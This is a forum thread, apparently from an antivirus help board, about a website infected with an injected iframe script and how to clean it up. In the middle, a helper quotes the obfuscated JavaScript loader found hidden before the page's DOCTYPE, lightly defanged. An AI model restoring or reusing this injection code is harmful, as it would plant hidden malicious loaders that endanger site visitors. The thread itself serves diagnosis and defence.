Could someone please check if this website www.banipepost.com has been infected by the HTML:Iframe-inf?
If so, how can it be removed from the website and prevent future problems.
thanks
Could someone please check if this website www.banipepost.com has been infected by the HTML:Iframe-inf?
If so, how can it be removed from the website and prevent future problems.
thanks
Well, I’m starting to analyze it, but this helps us believe that it is hosting malicious software…
This script outside (above) the starting html tag looks a bit suspicious. See image attached.
If so, how can it be removed from the website and prevent future problems.
Are you the owner of the website?
If not, I don’t think YOU can do anything, really, other than to notify the webmaster or owner of the site. But if you own the website, you can remove that script.
Then, I would make sure that all of your software is up to date, strengthen / change your passwords, or talk to your host about making sure that PHP, SQL, MYSQL, or whatever else that your site uses is up to date.
I have just visited the page and no alert by avast, perhaps it has been cleaned up.
Actually, there was never an alert from avast from my computer, only google chrome’s alert that I have posted in the first response to the O/P’s question.
Then, when I saw the code outside of the frame, I posted that. However, the code is still there.
The only problem is that I don’t have anyway to search through the code to find out what it’s doing.
Again though, other than google chrome’s warning, I don’t know if it’s malicious or not…
I just checked the page source and it isn’t displaying the script tag before the <!DOCTYPE html PUBLIC.
However, there is a blank line above that, which is unusual, so perhaps they have removed it, which has left the blank line
Ah sneaky, I have just scrolled a huge way to the right and now I see the obfuscated script, very sneaky.
sneaky sneaky sir.
To those who didn’t get that quote, it came from Mr. Deeds…
My sad attempt at humor, ;D.
I sent it to avast for further investigation though.
Hi
This is where you two are pointing at:
/////////////////////////^///////<script language=j*vascript>bleyyipoq="SOnHPUzp%V!O&mkiO&s";bxtapz="^sc!72i!70t l!61n!67ua!67e!3djavas!63r!69p!74!3e !20!66un!63t!69!6f!6e j!6dbdv!70!6bg!75(!6d!68!66bbw)!7bva!72!20!75mo!6f!72!73!70!2clxooo!6bg=\"M3)!2a!7e+'}!21p7!28^|#-B0Eoi,zFJ!6c9`{Z!66_!20!48th:!4by=!32!40!41I!75c1G!62!6eT!50!43!76!5bg!774!5c\"OV!5d.;x!36!24!73N!6d!64!61!72!26!55ke!71!385j\",nb!77fwgs!78!3d^\"\",n!6e!75!75hc!70,q!64!6cis!74!75q!68,!66!73pv!66!72!73=!22!22,!6e!79d!6cirz!3bfo!72!28u!6d!6f!6f!72s!70!3d!30!3bum!6for!73!70!3cm!68fbbw!2ele!6e!67!74!68;!75moo!72sp!2b!2b!29!7b n!6euuh!63!70!3dmhfb!62!77.!63!68!61rAt(!75moo!72s!70!29!3bqdli!73tu!71h=lxo!6f!6fkg.i!6ed!65!78Of!28nn!75!75!68!63p);if(!71!64lis!74!75qh>!2d1)!7b !6e!79d!6c!69rz=((!71!64l!69s!74!75!71h!2b1)!2581-!31!29;i!66(n!79!64lir!7a<!3d0)nyd!6ci!72z+=81;fs!70!76!66r!73!2b!3dlx!6f!6f!6fkg.char!41t!28!6eyd!6cir!7a!2d!31!29; } !65!6c!73e fsp!76!66rs+!3d!6e!6euuh!63p!3b!7dnbw!66!77!67sx!2b!3d!66spvfrs;!64!6fcume!6et.wr!69te(!6ebw!66!77gsx)!3b!7d!3c!2fscri!70!74>";vogazldrg=bleyyipoq.ch*rAt(8);abohqiefq=bxtapz.repl@ce(/!/g,vogazldrg);qjsgefm=unesc@pe(abohqiefq);var crkexpiq,rpngwnfh;document.write(qjsgefm);crkexpiq="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHh,:184Nr1c:N^*HZHh&=HZH[r&H1_&8,dn7&1TMw2HONn=:n894e=OzH4:e7:8,,78M_H2HGxH_cT1h,iTHw8r1hwcMi^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;.................................(E$5\"GUO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHw8r1hwcMi^H1_&8,dn7&1TMwzH4:e7:8,,78M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!Hh,:184Nr1c:N^*x</N1&,7h>H";jmbdvpkgu(crkexpiq);^^//////</script>
//////////////////////////////////////////////////////////////////////////
Made the script unworkable, so it cannot run, but indeed it is quite some work of injected art?
Finjan SecureBrowsing has analyzed the above web address as it currently exists on the web.
The analysis indicates that:
Potentially malicious behavior was detected on this page
Technical information:
-Code Obfuscation (Home-Encoding),
polonus
Thank you very much, I appreciate it. I wonder how they were able to inject that script?!?!
I removed it now, but I have to find a way to prevent this from happening in the future.
Commonly it is old versions of content management software, e.g. PHP, SQL, WordPress, etc. which are vulnerable to exploit.
So you need to ensure if you are using like this it has to be the latest version, you may have to speak to your Host (no bad thing anyway) if they provide this functionality. Change all your passwords for, ftp, any content control panel operations, etc.